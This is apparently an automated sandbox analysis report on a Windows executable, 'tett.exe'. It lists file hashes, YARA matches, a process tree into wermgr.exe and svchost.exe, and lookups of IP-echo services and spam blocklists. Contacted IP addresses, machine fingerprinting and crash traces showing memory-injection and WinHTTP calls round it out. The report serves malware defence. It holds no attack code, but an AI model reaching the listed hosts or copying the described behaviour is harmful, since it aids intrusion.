Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 8, 2021, 9:14 a.m.	April 8, 2021, 9:37 a.m.

Size	532.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`2939f396d5b175b2e1f28b05c09e812b`
SHA256	`088d508c5f4509185682108b422dcce6d1ca6ce82258f1340ab4e330da067b22`
CRC32	`E054C8A1`
ssdeep	`6144:H4Qq8J8SuK1ypY23lAF3oUooua2TXOGUIQ33wodqrxWWYwPPydyqBh+hF62S:HB1J8Su7bgYbDkrErxQ1y/pS`
PDB Path	F:\exeuse\ExeExecute\Release\testexe.pdb
Yara	win_files_operation - Affect private profile PE_Header_Zero - PE File Signature Zero OS_Processor_Check_Zero - OS Processor Check Signature Zero IsPE32 - (no description) IsWindowsGUI - (no description) IsPacked - Entropy Check HasDebugData - DebugData Check HasRichSignature - Rich Signature Check

tett.exe "C:\Users\test22\AppData\Local\Temp\tett.exe"
7140
- wermgr.exe C:\Windows\system32\wermgr.exe
  5332
  - svchost.exe C:\Windows\system32\svchost.exe
    3180

Name	Response	Post-Analysis Lookup
api.ip.sb	CNAME api.ip.sb.cdn.cloudflare.net A 104.26.13.31 A 104.26.12.31 A 172.67.75.172	104.26.13.31
myexternalip.com	A 34.117.59.81	34.117.59.81
150.134.208.175.zen.spamhaus.org
wtfismyip.com	A 95.217.228.176	95.217.228.176
150.134.208.175.b.barracudacentral.org	A 127.0.0.2	127.0.0.2
ident.me	A 176.58.123.25	176.58.123.25
ip.anysrc.net	A 116.203.16.95	116.203.16.95
api.ipify.org	A 54.225.165.85 A 50.19.96.218 CNAME nagano-19599.herokussl.com A 54.225.157.230 A 54.235.83.248 A 107.22.233.72 A 54.235.175.90 CNAME elb097307-934924932.us-east-1.elb.amazonaws.com A 23.21.76.253 A 54.243.164.148	23.21.76.253
150.134.208.175.cbl.abuseat.org

IP Address	Status	Action
104.26.13.31	Active	Moloch
116.203.16.95	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
173.81.4.147	Active	Moloch
176.58.123.25	Active	Moloch
181.143.251.154	Active	Moloch
34.117.59.81	Active	Moloch
46.4.176.106	Active	Moloch
54.235.175.90	Active	Moloch
91.243.125.5	Active	Moloch
95.217.228.176	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW April 8, 2021, 9:15 a.m.	computer_name: TEST22-PC	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

F:\exeuse\ExeExecute\Release\testexe.pdb

One or more processes crashed (3 events)

Time & API	Arguments	Status
__exception__ April 8, 2021, 9:15 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_LdrGetProcedureAddress+0x43 New_ntdll_LdrLoadDll-0x156 @ 0x72e1f7f3 GetProcAddress+0x60 GetModuleHandleA-0x80 kernelbase+0x4190 @ 0x7fefd6d4190 SvchostPushServiceGlobals+0x471 WinHttpQueryOption-0x1a7b winhttp+0x1eb99 @ 0x7fef9f6eb99 SvchostPushServiceGlobals+0x4fb WinHttpQueryOption-0x19f1 winhttp+0x1ec23 @ 0x7fef9f6ec23 WinHttpConnect+0x1ab WinHttpGetDefaultProxyConfiguration-0x1615 winhttp+0x13fe7 @ 0x7fef9f63fe7 exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x771d9a5a registers.r14: 868515839561326211 registers.r15: 38519093 registers.rcx: 0 registers.rsi: 854104880 registers.r10: 0 registers.rbx: 0 registers.rsp: 2221168 registers.r11: 0 registers.r8: 5 registers.r9: 1927993344 registers.rdx: 2 registers.r12: 2542992 registers.rbp: 0 registers.rdi: 0 registers.rax: 1 registers.r13: 449	1
__exception__ April 8, 2021, 9:16 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x72e1fc86 VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd703096 VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd7030d6 VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x76e8bbe1 0xad4df exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x771d9a5a registers.r14: 853946112 registers.r15: 867578836 registers.rcx: 27 registers.rsi: 2217136 registers.r10: 0 registers.rbx: 3 registers.rsp: 2216744 registers.r11: -125 registers.r8: 3 registers.r9: 1927998208 registers.rdx: 3 registers.r12: 854110096 registers.rbp: 3 registers.rdi: 40 registers.rax: 4 registers.r13: 0	1
__exception__ April 8, 2021, 9:16 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_kernel32_GetTickCount+0x19 New_kernel32_GetTimeZoneInformation-0x76 @ 0x72e1c0bf webio+0x18e4 @ 0x7fef9cc18e4 webio+0x9700 @ 0x7fef9cc9700 webio+0x969e @ 0x7fef9cc969e WinHttpCreateUrl+0x2109 WinHttpSendRequest-0x11f winhttp+0x73b1 @ 0x7fef9f573b1 WinHttpCreateUrl+0x200c WinHttpSendRequest-0x21c winhttp+0x72b4 @ 0x7fef9f572b4 WinHttpCloseHandle-0x108f winhttp+0x1251 @ 0x7fef9f51251 WinHttpCreateUrl+0x1f73 WinHttpSendRequest-0x2b5 winhttp+0x721b @ 0x7fef9f5721b WinHttpSetStatusCallback+0x408 WinHttpOpenRequest-0x500 winhttp+0x40f8 @ 0x7fef9f540f8 WinHttpCloseHandle+0x128 WinHttpOpen-0x1020 winhttp+0x2408 @ 0x7fef9f52408 exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x771d9a5a registers.r14: 2221320 registers.r15: 2221312 registers.rcx: 24 registers.rsi: 2218780 registers.r10: 0 registers.rbx: 2218992 registers.rsp: 2218336 registers.r11: -128 registers.r8: 3 registers.r9: 1927997696 registers.rdx: 3 registers.r12: 2221280 registers.rbp: 0 registers.rdi: 850803368 registers.rax: 4 registers.r13: 1994795888	1

Time & API

Arguments

Status

Return

Repeated

__exception__

April 8, 2021, 9:15 a.m.

stacktrace:

RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
